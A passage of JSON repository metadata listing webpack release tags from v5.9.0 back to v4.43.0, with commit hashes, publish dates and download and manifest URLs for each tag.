bpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p